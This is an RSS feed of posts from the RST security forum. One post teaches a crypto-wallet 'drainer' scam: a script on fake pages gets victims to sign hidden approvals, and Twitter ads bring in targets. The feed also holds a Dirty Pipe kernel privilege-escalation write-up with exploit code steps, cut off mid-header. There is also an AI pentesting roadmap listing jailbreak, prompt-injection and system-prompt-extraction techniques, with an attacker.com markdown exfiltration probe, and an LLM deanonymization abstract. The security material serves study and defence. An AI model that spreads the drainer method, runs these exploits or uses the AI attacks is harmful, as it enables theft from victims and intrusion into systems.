<?xml version="1.0"?>
<rss version="2.0"><channel><title>All Forums</title><link>https://rstforums.com/forum/rss/1-all-forums.xml/</link><description>All data</description><language>en</language><item><title>Hello all</title><link><![CDATA[https://rstforums.com/forum/topic/124104-salutare-all/?do=findComment&comment=701921]]></link><description>Hello, I have a question: does anyone have a Rockstar account they could lend me so I can play GTA 5 Online for a few days, a week at most?</description><pubDate>Sat, 04 Apr 2026 00:33:41 +0000</pubDate></item><item><title>Open Tracker Signups, Applications, and Invites</title><link><![CDATA[https://rstforums.com/forum/topic/124081-open-tracker-signups-applications-and-invites/?do=findComment&comment=701851]]></link><description>Tracker Invites/Open Signups</description><pubDate>Wed, 18 Mar 2026 19:28:59 +0000</pubDate></item><item><title>Proposal to change the forum's niche</title><link><![CDATA[https://rstforums.com/forum/topic/124079-propunere-schimbare-ni%C8%99%C4%83-pentru-forum/?do=findComment&comment=701844]]></link><description><![CDATA[Since we have so many years of experience behind us and plenty of people still know about RST, what if we shifted the forum's direction toward automation, tips &amp; tricks, AI and monetization, without ever getting into the area of fraud that we have always tried to fight? For 15 years I have had the ideal monetization method for RST sketched out, I believe it is still valid, and I don't see why we shouldn't start making money and help others make money with our help, without breaking the law. 
	 
	Admins and users, what do you think? Shall we get to work? Do we put our energy into doing serious work that truly adds value, or do we let all the dilettantes on communities like BlackHatWorld make money from junk, scams and tutorials that don't work? The RST community has always been fair to its users and has not promoted scams. Why wouldn't we turn this, and the experience all of us have, into a business that makes money?]]></description><pubDate>Tue, 17 Mar 2026 16:27:46 +0000</pubDate></item><item><title>Help opening accounting databases</title><link><![CDATA[https://rstforums.com/forum/topic/124077-ajutor-deschidere-baze-de-date-contabile/?do=findComment&comment=701841]]></link><description><![CDATA[Hello! I have a very serious situation in my family. My father has had a company since 1996 in which he is the sole shareholder, from which my mother, without any notarized power of attorney, stole a lot of merchandise by convincing the former accountant that my father is schizophrenic and persuading the accountant to stay in touch only with her and not with him. My mother set up another SRL of her own and moved the merchandise from my father's SRL to hers by forging my father's signature on invoices and at the Trade Register. I filed a complaint with the Economic Police, but nothing seems to be moving for now.
 


	Meanwhile she has also filed for divorce from him in court and moved in with a lover.
 


	The accountant emailed us the files of the two companies, but nobody manages to open them so we can see the invoices. Obviously the former accountant no longer answers the door or the phone. I tried SAGA and other accounting programs, but nothing. Can anyone help me? 😌 Gratitude for you!
 


	 
 


	I am attaching the databases: - &lt;redacted&gt;]]></description><pubDate>Mon, 16 Mar 2026 17:10:28 +0000</pubDate></item><item><title>If anyone can help me</title><link><![CDATA[https://rstforums.com/forum/topic/124076-daca-ma-poate-ajuta-careva/?do=findComment&comment=701835]]></link><description>Hello, I have an old Steam account, about 17 years old I think, inactive for 9 or 10 years. I forgot the password, and Steam refuses to send me a password reset link unless I send them a CD key. I bought Steam by SMS, the way it worked back then: an SMS, they took euros from my account and I received the code. Now I have nothing left except access to the email address.</description><pubDate>Sat, 14 Mar 2026 17:58:29 +0000</pubDate></item><item><title>Selling advertorials on approximately 700 sites in Romania</title><link><![CDATA[https://rstforums.com/forum/topic/124061-vand-advertoriale-in-aproximativ-700-site-uri-din-romania/?do=findComment&comment=701805]]></link><description>I am selling several advertorial packages at a good price, on sites with medium or high authority, and I also have a very good offer: advertorials on 107 sites for 2500 lei.</description><pubDate>Fri, 06 Mar 2026 07:56:30 +0000</pubDate></item><item><title>&#x1F525;&#x1F4B0; New Crypto method up to $100k Monthly for beginners and pros &#x1F525;&#x1F4B0;</title><link><![CDATA[https://rstforums.com/forum/topic/124059-%F0%9F%94%A5%F0%9F%92%B0-new-crypto-method-up-to-100k-monthly-for-beginners-and-pros-%F0%9F%94%A5%F0%9F%92%B0/?do=findComment&comment=701786]]></link><description>Hello everyone, after many asked me to share this method I am tired of answering everyone in private and explaining, so here is a full shared method, step by step. The method I am talking about is crypto draining. For those who don't know what it is: it's a script you add to any scam page, and it asks the victim to connect his crypto wallet as a legit action, like connecting or claiming something. Once he connects, he receives a signature request like on any legit website, 
but inside this request there is a hidden request that gives permission to take all crypto once signed 
 




	Next, you need a good traffic method , a traffic method that will target crypto users. For me, I am using Twitter ads, targeting new projects, and posting free claims. I have a team working with me of 3 people. We are making until now this money: &#xA3;91k. You can start with just a $100 budget for ads, and then you can go with more once you get hits. There are some people making over &#xA3;1m in one hit&#x2014;hit crazy, right? Our biggest hit ever was &#xA3;466k. That's right, one good wallet can change your life. 
 


	One more thing: be sure that you have a good method; don't just jump in with no knowledge or dig deep in the methods shared on panels like Exogator.
 


	Well, this is the end for now. If you have any questions, I will post a part 2 thread that answers these questions.</description><pubDate>Fri, 27 Feb 2026 21:32:39 +0000</pubDate></item><item><title>Large-scale online deanonymization with LLMs</title><link><![CDATA[https://rstforums.com/forum/topic/124058-large-scale-online-deanonymization-with-llms/?do=findComment&comment=701781]]></link><description>We show that large language models can be used to perform at-scale deanonymization. With full Internet access, our agent can re-identify Hacker News users and Anthropic Interviewer participants at high precision, given pseudonymous online profiles and conversations alone, matching what would take hours for a dedicated human investigator. We then design attacks for the closed-world setting. Given two databases of pseudonymous individuals, each containing unstructured text written by or about that individual, we implement a scalable attack pipeline that uses LLMs to: (1) extract identity-relevant features, (2) search for candidate matches via semantic embeddings, and (3) reason over top candidates to verify matches and reduce false positives. Compared to classical deanonymization work (e.g., on the Netflix prize) that required structured data, our approach works directly on raw user content across arbitrary platforms. We construct three datasets with known ground-truth data to evaluate our attacks. The first links Hacker News to LinkedIn profiles, using cross-platform references that appear in the profiles. Our second dataset matches users across Reddit movie discussion communities; and the third splits a single user&#x2019;s Reddit history in time to create two pseudonymous profiles to be matched. In each setting, LLM-based methods substantially outperform classical baselines, achieving up to 68% recall at 90% precision compared to near 0% for the best non-LLM method. 
Our results show that the practical obscurity protecting pseudonymous users online no longer holds and that threat models for online privacy need to be reconsidered.
 


	 
 


	Download: https://arxiv.org/pdf/2602.16800</description><pubDate>Fri, 27 Feb 2026 14:27:32 +0000</pubDate></item><item><title>AI/ML Pentesting Roadmap</title><link><![CDATA[https://rstforums.com/forum/topic/124057-aiml-pentesting-roadmap/?do=findComment&comment=701780]]></link><description><![CDATA[🛡️ AI/ML Pentesting Roadmap
	



	
 


	
		A comprehensive, structured guide to learning AI/ML security and penetration testing — from zero to practitioner.
	 




	
		📋 Table of Contents
	



	
		Prerequisites
	
	
		Phase 1 — Foundations
	
	
		Phase 2 — AI/ML Security Concepts
	
	
		Phase 3 — Prompt Injection &amp; LLM Attacks
	
	
		Phase 4 — Hands-On Practice
	
	
		Phase 5 — Advanced Exploitation Techniques
	
	
		Phase 6 — Real-World Research &amp; Bug Bounty
	
	
		Standards, Frameworks &amp; References
	
	
		Tools &amp; Repositories
	
	
		Books, PDFs &amp; E-Books
	
	
		Video Resources
	
	
		CTF &amp; Competitions
	
	
		Bug Bounty Programs
	
	
		Community &amp; News
	
	
		Suggested Learning Path by Experience Level
	




	
		Prerequisites
	



	Before diving into AI/ML pentesting, ensure you have the following foundation:
 


	
		General Security Basics
	



	
		PortSwigger Web Security Academy — Free, hands-on web security training (XSS, SQLi, SSRF, etc.)
	
	
		TryHackMe — Pre-Security Path
	
	
		HackTheBox Academy
	
	
		OWASP Top 10
	



	
		Programming (Python is essential)
	



	
		Python for Everybody — Coursera
	
	
		Automate the Boring Stuff with Python — Free online book
	
	
		CS50P — Python — Free Harvard course
	



	
		APIs &amp; HTTP
	



	
		Understand REST APIs, HTTP methods, headers, and authentication flows
	
	
		Postman Learning Center
	
	
		Practice with tools: curl, Burp Suite, Postman
	




	
		Phase 1 — Foundations
	



	
		1.1 Machine Learning Fundamentals
	



	
		
			
		Resource | Type | Cost
		Machine Learning — Andrew Ng (Coursera) | Course | Audit Free
		Introduction to ML — edX | Course | Audit Free
		fast.ai Practical Deep Learning | Course | Free
		Google Machine Learning Crash Course | Course | Free
		Kaggle ML Courses | Course | Free
		3Blue1Brown — Neural Networks | Video | Free
			
		
	



	
		1.2 Large Language Models (LLMs)
	



	Understanding how LLMs work is critical before attacking them.
 


	
		
			
		Resource | Type | Cost
		Andrej Karpathy — Intro to LLMs | Video | Free
		Andrej Karpathy — Let's build GPT | Video | Free
		Hugging Face NLP Course | Course | Free
		LLM University by Cohere | Course | Free
		Prompt Engineering Guide | Guide | Free
			
		
	




	
		Phase 2 — AI/ML Security Concepts
	



	
		2.1 Core Security Concepts
	



	
		OWASP LLM Top 10 — The definitive OWASP list for LLM vulnerabilities
	
	
		MITRE ATLAS Matrix — Adversarial Tactics, Techniques, and Common Knowledge for AI systems
	
	
		NIST AI Risk Management Framework — Federal AI risk guidance
	
	
		IBM — AI Security Overview
	
	
		AI Village — LLM Threat Modeling
	
	
		Promptingguide — Adversarial Attacks
	
	
		HackerOne — Ultimate Guide to Managing Ethical and Security Risks in AI
	



	
		2.2 Attack Surface Overview
	



	Key attack vectors in AI/ML systems:
 


	
		Prompt Injection — Manipulating LLM behavior through crafted inputs
	
	
		Jailbreaking — Bypassing safety filters and guardrails
	
	
		Model Inversion — Extracting training data from a model
	
	
		Membership Inference — Determining if data was in training set
	
	
		Data Poisoning — Corrupting training data to influence behavior
	
	
		Adversarial Examples — Perturbed inputs that fool classifiers
	
	
		Model Extraction/Stealing — Cloning a model via API queries
	
	
		Supply Chain Attacks — Malicious models/weights on platforms like Hugging Face
	
	
		Insecure Plugin/Tool Integration — Exploiting LLM agents with external tools
	
	
		Training Data Exfiltration — Extracting memorized private data
	
	
		Denial of Service — Overloading models via crafted prompts
	



	
		2.3 MLOps &amp; Infrastructure Security
	



	
		From MLOps to MLOops — JFrog
	
	
		Offensive ML Playbook
	
	
		AI Exploits — ProtectAI
	
	
		Awesome AI Security — ottosulin
	




	
		Phase 3 — Prompt Injection &amp; LLM Attacks
	



	
		3.1 Understanding Prompt Injection
	



	
		IBM Guide on Prompt Injection
	
	
		Simon Willison's Explanation of Prompt Injection
	
	
		Learn Prompting — Prompt Hacking and Injection
	
	
		PortSwigger LLM Attacks
	
	
		NCC Group — Exploring Prompt Injection Attacks
	
	
		Bugcrowd — AI Vulnerability Deep Dive: Prompt Injection
	



	
		3.2 Jailbreaking Techniques
	



	
		DAN (Do Anything Now) — Classic jailbreak technique: Chatgpt-DAN Repo
	
	
		Role-playing / Persona manipulation
	
	
		Token smuggling — Encoding instructions to bypass filters
	
	
		Prompt leaking — Extracting system prompts
	
	
		Indirect prompt injection — Attacks via documents, web content, memory
	
	
		WideOpenAI — Jailbreak Collection
	
	
		PayloadsAllTheThings — Prompt Injection
	
	
		PALLMs — Payloads for Attacking LLMs
	



	
		3.3 Indirect Prompt Injection
	



	A more sophisticated attack where malicious instructions are injected via external data sources (emails, documents, websites) that an LLM agent processes.
 


	
		Greshake — LLM Security / Not What You've Signed Up For
	
	
		Embrace The Red — Blog — Comprehensive blog covering real-world indirect injection
	
	
		GitHub Copilot Chat: Prompt Injection to Data Exfiltration
	
	
		Google AI Studio Data Exfiltration
	



	
		3.4 Advanced Prompt Attack Techniques
	



	
		How to Persuade an LLM to Change Its System Prompt
	
	
		Bugcrowd Ultimate Guide to AI Security (PDF)
	
	
		Snyk OWASP Top 10 LLM (PDF)
	
	
		Vanna.AI Prompt Injection RCE — JFrog
	




	
		Phase 4 — Hands-On Practice
	



	
		4.1 Interactive Platforms &amp; Games
	



	
		
			
		Platform | Description | Link
		Gandalf | LLM prompt testing game — extract the password | gandalf.lakera.ai
		Prompt Airlines | Gamified prompt injection learning | promptairlines.com
		Crucible | Interactive AI security challenges by Dreadnode | crucible.dreadnode.io
		Immersive Labs AI | Structured AI security exercises | prompting.ai.immersivelabs.com
		Secdim AI Games | Prompt injection games | play.secdim.com/game/ai
		HackAPrompt | Community prompt injection competition | hackaprompt.com
		PortSwigger LLM Labs | Hands-on web LLM attack labs | Web Security Academy
			
		
	



	
		4.2 Vulnerable-by-Design Projects
	



	
		
			
		Repository | Description
		Damn Vulnerable LLM Agent — WithSecureLabs | Intentionally vulnerable LLM agent
		ScottLogic Prompt Injection Playground | Local prompt injection lab
		Greshake LLM Security Tools | Proof-of-concept attacks
			
		
	



	
		4.3 CTF Writeups to Study
	



	
		CTF Writeup — HackPack CTF 2024 LLM Edition
	
	
		LLM Pentest Writeups — System Weakness
	




	
		Phase 5 — Advanced Exploitation Techniques
	



	
		5.1 Agent &amp; Tool Integration Attacks
	



	When LLMs are integrated with tools (code execution, web browsing, file systems), the attack surface expands dramatically.
 


	
		LLM Pentest: Leveraging Agent Integration for RCE — BlazeInfoSec
	
	
		LLM Pentest: Leveraging Agent Integration For RCE (full)
	
	
		Dumping a Database with an AI Chatbot — Synack
	
	
		CSWSH Meets LLM Chatbots
	



	
		5.2 Data Exfiltration via LLMs
	



	
		Google AI Studio: LLM-Powered Data Exfiltration
	
	
		Google AI Studio Mass Data Exfil (Regression)
	
	
		Hacking Google Bard — From Prompt Injection to Data Exfiltration
	
	
		AWS Amazon Q Markdown Rendering Vulnerability
	
	
		GitHub Copilot Chat Data Exfiltration
	



	
		5.3 Account Takeover &amp; Authentication Attacks
	



	
		ChatGPT Account Takeover — Wildcard Web Cache Deception
	
	
		Shockwave — Critical ChatGPT Vulnerability (Web Cache Deception)
	
	
		Security Flaws in ChatGPT Ecosystem — Salt Security
	
	
		OpenAI Allowed Unlimited Credit on New Accounts — Checkmarx
	



	
		5.4 XSS &amp; Web Vulnerabilities in AI Products
	



	
		XSS Marks the Spot: Digging Up Vulnerabilities in ChatGPT — Imperva
	
	
		Zeroday on GitHub Copilot
	



	
		5.5 Model &amp; Infrastructure Attacks
	



	
		Shelltorch Explained: Multiple Vulnerabilities in TorchServe (CVSS 9.9)
	
	
		From ChatBot to SpyBot: ChatGPT Post-Exploitation — Imperva
	



	
		5.6 Persistent Attacks &amp; Memory Exploitation
	



	
		ChatGPT Persistent Denial of Service via Memory Attacks — Embrace the Red
	



	
		5.7 Adversarial Machine Learning
	



	
		CleverHans Library — Adversarial example library
	
	
		ART (Adversarial Robustness Toolbox) — IBM
	
	
		Foolbox — Python toolbox for adversarial attacks
	




	
		Phase 6 — Real-World Research &amp; Bug Bounty
	



	
		6.1 Notable Research &amp; Disclosures
	



	
		We Hacked Google AI for $50,000 — LandH
	
	
		New Google Gemini Content Manipulation Vulnerabilities — HiddenLayer
	
	
		Jailbreak of Meta AI (Llama 3.1) Revealing Config Details
	
	
		Bypass Instructions to Manipulate Google Bard
	
	
		My LLM Bug Bounty Journey on Hugging Face Hub
	
	
		Anonymised Penetration Test Report — Volkis
	
	
		Lakera Real World LLM Exploits (PDF)
	



	
		6.2 How to Find LLM Vulnerabilities
	



	Key areas to test when assessing an LLM-powered application:
 


	
		System prompt extraction — Can you leak the hidden system prompt?
	
	
		Instruction override — Can you ignore system-level instructions?
	
	
		Plugin/tool abuse — Can agent tools be misused (SSRF, RCE, SQLi)?
	
	
		Data exfiltration via markdown — Does the UI render ![](https://attacker.com?q=...) ?
	
	
		Persistent injection via memory — Can you inject instructions that persist in memory/RAG?
	
	
		PII leakage — Does the model reveal training data or other users' data?
	
	
		Cross-user data leakage — In multi-tenant apps, can you access other users' contexts?
	
	
		Authentication bypass — Can you trick the LLM into performing privileged actions?
	




	
		Standards, Frameworks &amp; References
	



	
		
			
		Resource | Description
		OWASP LLM Top 10 | Top 10 LLM vulnerability classes
		MITRE ATLAS | AI adversarial threat matrix
		NIST AI RMF | US Federal AI risk management framework
		OWASP AI Exchange | Cross-industry AI security guidance
		ISO/IEC 42001 | International AI management standard
		ENISA AI Threat Landscape | EU AI threat landscape report
		Google Secure AI Framework (SAIF) | Google's AI security framework
			
		
	




	
		Tools &amp; Repositories
	



	
		Offensive Tools
	



	
		
			
		Tool | Purpose
		Garak | LLM vulnerability scanner
		PyRIT | Microsoft's Python Risk Identification Toolkit for LLMs
		LLM Fuzzer | Fuzzing framework for LLMs
		PALLMs | Payloads for attacking LLMs
		PromptInject | Prompt injection attack framework
		PurpleLlama / CyberSecEval | Meta's LLM security evaluation
			
		
	



	
		Defensive / Scanning Tools
	



	
		
			
		Tool | Purpose
		Rebuff | Prompt injection detection
		NeMo Guardrails | NVIDIA guardrail framework
		Lakera Guard | Commercial prompt injection protection
		AI Exploits — ProtectAI | Real-world ML exploit collection
		ModelScan | Scan ML model files for malicious code
			
		
	



	
		Reference Lists
	



	
		
			
		Resource | Description
		Awesome LLM Security — corca-ai | Curated LLM security list
		Awesome LLM — Hannibal046 | Everything LLM including security
		Awesome AI Security — ottosulin | General AI security resources
		LLM Hacker's Handbook | Comprehensive hacking handbook
		PayloadsAllTheThings — Prompt Injection | Payload collection
		WideOpenAI | Jailbreak and bypass collection
		Chatgpt-DAN | DAN jailbreak collection
			
		
	




	
		Books, PDFs &amp; E-Books
	



	
		
			
		Resource | Link
		LLM Hacker's Handbook | GitHub
		OWASP Top 10 for LLM (Snyk) | PDF
		Bugcrowd Ultimate Guide to AI Security | PDF
		Lakera Real World LLM Exploits | PDF
		HackerOne Ultimate Guide to Managing AI Risks | E-Book
		Adversarial Machine Learning — Goodfellow et al. | arXiv
			
		
	




	
		Video Resources
	



	
		
			
		Resource | Link
		Penetration Testing Against and With AI/LLM/ML (Playlist) | YouTube
		Andrej Karpathy — Intro to Large Language Models | YouTube
		DEF CON AI Village Talks | YouTube
		LiveOverflow — AI/ML Security | YouTube
		3Blue1Brown — Neural Networks Series | YouTube
		John Hammond — AI Security Challenges | YouTube
		Cybrary — Machine Learning Security | Cybrary
			
		
	




	
		CTF &amp; Competitions
	



	
		
			
		Competition | Description | Link
		Crucible | Ongoing AI security challenges | crucible.dreadnode.io
		HackAPrompt | Annual prompt injection competition | hackaprompt.com
		AI Village CTF (DEF CON) | Annual AI security CTF at DEF CON | aivillage.org
		Gandalf | Self-paced LLM challenge | gandalf.lakera.ai
		Prompt Airlines | Gamified injection challenges | promptairlines.com
		Hack The Box AI Challenges | HTB AI-themed challenges | hackthebox.com
		Secdim AI Games | Web-based AI security games | play.secdim.com/game/ai
			
		
	




	
		Bug Bounty Programs
	



	AI/ML security bug bounties are growing rapidly. Target these platforms:
 


	
		
			
		Program | Scope | Link
		OpenAI Bug Bounty | ChatGPT, API, plugins | bugcrowd.com/openai
		Google AI Bug Bounty | Gemini, Bard, Vertex AI | bughunters.google.com
		Meta AI Bug Bounty | Llama models, Meta AI | facebook.com/whitehat
		HuggingFace via ProtectAI | Hub, models, spaces | huntr.com
		Anthropic Bug Bounty | Claude, API | anthropic.com/security
		Microsoft (Copilot, Azure AI) | Copilot, Azure OpenAI | msrc.microsoft.com
		Huntr (AI/ML focused) | Open source ML libraries | huntr.com
			
		
	



	Tips for AI bug bounty:
 


	
		Focus on data exfiltration via markdown rendering (common finding)
	
	
		Test plugin/tool integrations thoroughly
	
	
		Look for prompt injection in RAG pipelines
	
	
		Explore memory and persistent context manipulation
	
	
		Check for cross-tenant data leakage in multi-user deployments
	




	
		Community &amp; News
	



	
		Communities
	



	
		AI Village — DEF CON's AI security community
	
	
		OWASP AI Exchange — Open standard for AI security
	
	
		ProtectAI — AI security research and tools
	
	
		Embrace the Red — Blog — Leading blog on LLM security
	
	
		Kai Greshake's Research — Indirect prompt injection research
	



	
		Newsletters &amp; Blogs
	



	
		The Batch — DeepLearning.AI — Weekly AI news
	
	
		Simon Willison's Weblog — Authoritative LLM security commentary
	
	
		HiddenLayer Research — AI security research
	
	
		Lakera Blog — LLM security insights
	
	
		PortSwigger Research — Web + AI security research
	




	
		Suggested Learning Path by Experience Level
	



	
		🟢 Beginner (0–3 months)
	



	
		Complete PortSwigger Web Security Academy fundamentals
	
	
		Learn Python basics
	
	
		Take Google ML Crash Course
	
	
		Read OWASP LLM Top 10
	
	
		Play Gandalf — all levels
	
	
		Read Simon Willison's prompt injection article
	
	
		Watch Andrej Karpathy — Intro to LLMs
	



	
		🟡 Intermediate (3–9 months)
	



	
		Study MITRE ATLAS Matrix
	
	
		Complete PortSwigger LLM Attack labs
	
	
		Set up and exploit Damn Vulnerable LLM Agent
	
	
		Complete Prompt Airlines and Crucible challenges
	
	
		Read the LLM Hacker's Handbook
	
	
		Study the Embrace the Red blog in full
	
	
		Experiment with Garak and PyRIT
	
	
		Try Offensive ML Playbook
	



	
		🔴 Advanced (9+ months)
	



	
		Participate in AI Village CTF at DEF CON
	
	
		Submit findings to Huntr or OpenAI Bug Bounty
	
	
		Study adversarial ML with ART and CleverHans
	
	
		Read academic papers on model inversion, membership inference, and data extraction
	
	
		Contribute to open source tools like Garak or AI Exploits
	
	
		Build your own vulnerable LLM demo environment
	
	
		Write and publish research — blog posts, CVEs, conference talks
	




	
		Key Academic Papers
	



	
		
			
		Paper | Year
		Explaining and Harnessing Adversarial Examples — Goodfellow et al. | 2014
		Extracting Training Data from Large Language Models — Carlini et al. | 2021
		Not What You've Signed Up For: Compromising Real-World LLM-Integrated Applications with Indirect Prompt Injection — Greshake et al. | 2023
		Membership Inference Attacks against Machine Learning Models — Shokri et al. | 2017
		Universal and Transferable Adversarial Attacks on Aligned Language Models — Zou et al. | 2023
		Jailbroken: How Does LLM Safety Training Fail? — Wei et al. | 2023
		Prompt Injection attack against LLM-integrated Applications | 2023
			
		
	




	Last updated: 2025 | Contributions welcome — submit a PR with new resources.
 


	 
 


	Source: https://github.com/anmolksachan/AI-ML-Free-Resources-for-Security-and-Prompt-Injection]]></description><pubDate>Fri, 27 Feb 2026 14:26:49 +0000</pubDate></item><item><title>[Q] Advice for a future in CyberSecurity?</title><link><![CDATA[https://rstforums.com/forum/topic/124054-q-sfaturi-pentru-un-viitor-in-cybersecurty/?do=findComment&comment=701770]]></link><description>I want to start working on something for my future; what should I start with for a future in cybersecurity?</description><pubDate>Thu, 26 Feb 2026 23:01:50 +0000</pubDate></item><item><title>Malwarebytes Smoking Crack (0day + Banger Song)</title><link><![CDATA[https://rstforums.com/forum/topic/124044-malwarebytes-smoking-crack-0day-banger-song/?do=findComment&comment=701736]]></link><description>Have you seen this? 
 


	 
 


	#UwU Underground</description><pubDate>Sat, 21 Feb 2026 11:35:46 +0000</pubDate></item><item><title>Linux Kernel Dirty Pipe Exploitation (Logic Bug &#x2014; CVE-2022&#x2013;0847)</title><link><![CDATA[https://rstforums.com/forum/topic/124041-linux-kernel-dirty-pipe-exploitation-logic-bug-%E2%80%94-cve-2022%E2%80%930847/?do=findComment&comment=701707]]></link><description><![CDATA[by: Antonius (w1sdom) 
	https://www.bluedragonsec.com 
	https://github.com/bluedragonsecurity
 


	 
 


	Dirty Pipe (CVE-2022-0847) is one of the most significant security vulnerabilities in Linux Kernel 5.8–5.15.24, discovered by Max Kellermann in 2022. This vulnerability allows ordinary users (without special privileges) to overwrite data in files that should be read-only.
 


	6.3.3.1. Understanding Core Concepts



	Before discussing Dirty Pipe in detail, here are some Linux kernel internal concepts that need to be understood:
 


	1. Paging



	Paging is a memory management mechanism in the Linux kernel where the memory system divides physical memory into fixed-size small blocks called page frames, and virtual memory is divided into blocks of the same size called pages.
 


	This mechanism allows the kernel to map virtual address space of processes to physical memory in a non-sequential manner, which is crucial for efficiency and security in modern systems.
 


	2. Page (Virtual Memory)



	In Linux, a page is the smallest unit of physical memory management handled by the kernel.
 


	Analogy: RAM is like a giant book. A page is one sheet of paper in that book. The kernel doesn’t move data bit by bit, but rather sheet by sheet (page by page).
 


	Generally, on modern system architectures (such as x86_64), the standard size of one page is 4 KB (4096 bytes).
 


	3. Page Cache



	This is a crucial part. Linux doesn’t read files directly from disk every time because it’s slow. The kernel copies file contents into RAM called the Page Cache.
 


	
		When we read a file, the kernel loads it into the Page Cache.
	
	
		If another process wants to read the same file, the kernel only provides a reference to the page that already exists in that memory.
	



	Page cache resides in kernel space.
 


	4. Pipe Buffer



	Pipe is an Inter-Process Communication (IPC) mechanism. Internally, the kernel manages pipes using the pipe_inode_info data structure. Data inside a pipe is stored in a “buffer” called Pipe Buffer.
 


	
		Ring Buffer: The kernel uses a circular (ring) structure to manage this buffer. A ring buffer is a data structure that uses a single array with a fixed size as if its end is connected back to its beginning. This creates a data flow that “rotates” endlessly.
	
	
		Flags: Each buffer has attributes or “flags” that determine its behavior (for example, whether the buffer can be merged).
	



	Pipe buffer resides in kernel space.
 


	5. Pipe Buffer Flag (PIPE_BUF_FLAG_CAN_MERGE)



	The PIPE_BUF_FLAG_CAN_MERGE flag was introduced in Linux Kernel version 5.8.
 


	This is where the main vulnerability lies: the flag named PIPE_BUF_FLAG_CAN_MERGE.
 


	
		Its function: Tells the kernel that new data written to the pipe can be merged into an existing buffer.
	
	
		The problem: Before the Dirty Pipe fix, the kernel did not properly clear (reset) this flag when performing splice().
	



	6. Splice



	splice() is a syscall for moving data between two file descriptors without copying the data between kernel space and user space. This is often referred to as a Zero-copy mechanism.
 


	The splice() syscall is the “main actor” in Dirty Pipe:
 


	
		Instead of physically copying data, splice() performs optimization by making the Pipe Buffer point directly to the page in the Page Cache.
	
	
		This means the pipe doesn’t contain a copy of the file data, but only a “pointer” to the file’s physical memory.
	



	7. Copy on Write (CoW)



	The Copy-on-Write (CoW) mechanism is a memory management optimization strategy used by the Linux kernel to delay data copying until absolutely necessary.
 


	The relationship between Copy-on-Write (CoW) and the Dirty Pipe exploit (CVE-2022-0847) is about how a small bug in the Linux kernel successfully “tricks” the CoW mechanism, allowing data to be written to files that should be read-only.
 


	8. Dirty Page



	A dirty page is a memory page in RAM that has been modified by an application, but the changes have not yet been written back to secondary storage (such as SSD or hard disk).
 


	6.3.3.2. Analysis of Dirty Pipe Vulnerability



	Dirty Pipe is a type of logic bug in pipe buffer handling in Linux kernel 5.8 through Linux kernel 5.15.24.
 


	The main problem lies in the Pipe mechanism (inter-process communication channel) and how the kernel manages the Page Cache (memory that stores copies of file data from disk).
 


	The core issue is a bug in the PIPE_BUF_FLAG_CAN_MERGE flag.
 


	The main problem lies in the kernel’s failure to properly re-initialize this flag (logic bug). Here is the code analysis:
 


	In the copy_page_to_iter_pipe and push_to_pipe functions in the Linux kernel before version 5.16.11, when performing splice operations, the kernel prepares the pipe_buffer structure but forgets to clean the .flags member.
 


	Vulnerable Code Structure:
 


	 
 


 

// Location of problem: fs/pipe.c or include/linux/pipe_fs_i.h
struct pipe_buffer {
    struct page *page;
    unsigned int offset, len;
    const struct pipe_buf_operations *ops;
    unsigned int flags; // <--- THIS FLAG IS NOT RESET
    unsigned long private;
};


	Code Before Patch (Vulnerable):
 

// lib/iov_iter.c - Before CVE-2022-0847 patch
static size_t copy_page_to_iter_pipe(struct page *page,
    size_t offset, size_t bytes, struct iov_iter *i) {
    // ---------snip-----------
    struct pipe_buffer *buf = &pipe->bufs[head & mask];

    buf->ops = &page_cache_pipe_buf_ops;
    buf->page = page;
    buf->offset = offset;
    buf->len = bytes;
    // PROBLEM: buf->flags NOT TOUCHED AT ALL
    // --------snip----------------------
}


	Code After Patch (Fixed):
 

buf->ops = &page_cache_pipe_buf_ops;
buf->page = page;
buf->offset = offset;
buf->len = bytes;
buf->flags = 0; // <--- TOTAL RESET TO ZERO


	Why is buf->flags = 0 better than just turning off a specific flag? Because pipe_buffer is a reused structure. If we only turn off one flag (CAN_MERGE), other garbage flags from previous pipe usage (such as PIPE_BUF_FLAG_GIFT or other custom flags) might still remain and cause strange behavior or new security holes in the future. Setting it to 0 ensures the buffer is in a completely “clean” state.
 


	Why Can This Be Exploited?



	Here is the Dirty Pipe exploitation flow:
 


	
		Pollution Stage: The attacker inserts data into the pipe via write(). A regular write() operation will set buf->flags = PIPE_BUF_FLAG_CAN_MERGE.
	
	
		Drain Stage: The attacker reads that data. The buffer is now logically “empty”, but its structure still exists in kernel memory with the CAN_MERGE flag still active.
	
	
		Splice Stage: When the splice() syscall maps a read-only file to a pipe, the copy_page_to_iter_pipe() function is called. Due to the bug above, it fills buf->page with the original file’s memory page but doesn’t reset buf->flags.
	
	
		Execution: The kernel thinks this file buffer can still be merged. The next write to the pipe won’t create a new buffer, but will directly modify the memory page (Page Cache) that was mapped earlier.
	



	At this stage, the attacker’s data is already stored in RAM. A page in RAM whose contents differ from what’s on disk is called a “Dirty Page”.
 


	If this stage is successfully reached, it means the exploitation has succeeded! Once the Page Cache changes, the effect is instant. If we overwrite /etc/passwd in RAM, we can immediately run su root at that very moment.
 


	6.3.3.3. Dirty Pipe Exploitation



	For Dirty Pipe exploitation, we don’t need to disable any kernel protections, because none of them are relevant to preventing this logic bug.
 


	To exploit the Dirty Page logic bug, our exploit will perform the following steps:
 


	Step 1. Prepare the pipe and fill the pipe until full with the goal of triggering the PIPE_BUF_FLAG_CAN_MERGE flag.
 

pipe(p);
int capacity = fcntl(p[1], 1032);
static char dummy[4096];
for (int r = capacity; r &gt; 0; ) {
    int n = r &gt; sizeof(dummy) ? sizeof(dummy) : r;
    write(p[1], dummy, n);
    r -= n;
}


	Step 2. Empty the pipe.
 

for (int r = capacity; r &gt; 0; ) {
    int n = r &gt; sizeof(dummy) ? sizeof(dummy) : r;
    read(p[0], dummy, n);
    r -= n;
}


	Step 3. Use splice() to insert data from the target file into the pipe.
 

if (splice(fd, &amp;offset, p[1], NULL, 1, 0) &lt; 0) {
    perror("[-] splice failed");
    return 0;
}


	Step 4. Write the payload data to the pipe.
 

write(p[1], payload, strlen(payload));


	Complete Exploit Code for Dirty Pipe Exploitation
 

/*
Exploit Title: Linux Kernel 5.8 &lt; 5.15.25 - Local Privilege Escalation (DirtyPipe 2)
Exploit Author: Antonius (w1sdom)
github : https://github.com/bluedragonsecurity
web : https://www.bluedragonsec.com

tested on :
- linux kernel 5.13.0-21-generic (compiled on lubuntu 20.04.5)
- linux lubuntu 20.04.2 - linux kernel 5.8

Original Author: Max Kellermann (max.kellermann@ionos.com)
CVE: CVE-2022-0847

 * Copyright 2022 CM4all GmbH / IONOS SE
 *
 * author: Max Kellermann &lt;max.kellermann@ionos.com&gt;
